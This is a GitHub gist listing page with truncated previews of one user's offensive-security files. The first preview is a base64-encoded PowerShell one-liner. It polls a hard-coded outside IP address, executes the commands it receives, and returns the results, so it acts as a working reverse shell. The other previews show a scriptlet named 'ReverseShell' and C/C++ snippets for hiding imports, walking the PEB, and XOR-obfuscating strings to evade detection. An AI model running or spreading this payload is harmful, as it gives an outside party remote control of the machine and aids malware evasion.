This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -e JABzAD0AJwAxADUAOQAuADYANQAuADEANgA4AC4AMQAzADUAOgA4ADAAOAAwACcAOwAkAGkAPQAnAGUAZgA5AGQAYgA1ADMAOAAtADIANQBiADIAYgA3ADAANQAtAGMAMQAyAGUAMwBhADAANAAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwBlAGYAOQBkAGIANQAzADgAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AYwA3ADEAMQAtAGIAYgA0ADUAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMgA1AGIAMgBiADcAMAA1ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtAGMANwAxADEALQBiAGIANAA1ACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQ |
trevorsaudi
/ ws.sct
Last active
December 4, 2023 13:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="ReverseShell" | |
| progid="ReverseShell" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
trevorsaudi
/ ZeroImport.cpp
Created
October 23, 2023 05:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include "helpers.h" | |
| #pragma comment(linker, "/entry:WinMain") | |
| typedef DWORD (WINAPI * WaitForSingleObject_t)( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "PEstructs.h" | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include "helpers.h" | |
| HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName) { | |
| // get the offset of Process Environment Block |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| void XOR(char * data, size_t data_len, char * key, size_t key_len) { | |
| int j; | |
| j = 0; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| int main(void) { | |
| HMODULE hKernel32 = GetModuleHandle("kernel32.dll"); | |
| HMODULE hNtdll = GetModuleHandle("ntdll.dll"); | |
| DWORD oldprotect; | |
| // Function pointers typedefs |
trevorsaudi
/ MessageBox2.c
Last active
October 16, 2023 16:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <iostream> | |
| #define KEY 'A' // our key | |
| // Function to encrypt/decrypt strings | |
| void XOR(LPSTR data, int data_len) { | |
| for (int i = 0; i < data_len; i++) { | |
| data[i] ^= KEY; | |
| } |
trevorsaudi
/ MessageBox.c
Last active
October 16, 2023 16:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <iostream> | |
| int main() { | |
| // Load the user32.dll library | |
| HMODULE user32Dll = GetModuleHandle(L"user32.dll"); | |
| // Define a function pointer for MessageBoxW | |
| typedef int (WINAPI* MessageBoxWFunc)( | |
| HWND hwnd, |
trevorsaudi
/ GetModuleHandle.c
Created
October 15, 2023 05:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| HMODULE GetModuleHandleW( | |
| [in, optional] LPCWSTR lpModuleName // name of the loaded module , DLL or exe e.g user32.dll | |
| ); |
trevorsaudi
/ GetProcAddress.c
Last active
October 15, 2023 05:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FARPROC GetProcAddress( | |
| [in] HMODULE hModule, // handle to DLL module containing the function we are looking for | |
| [in] LPCSTR lpProcName // function name we are looking for. Can also be an ordinal value | |
| ); |
NewerOlder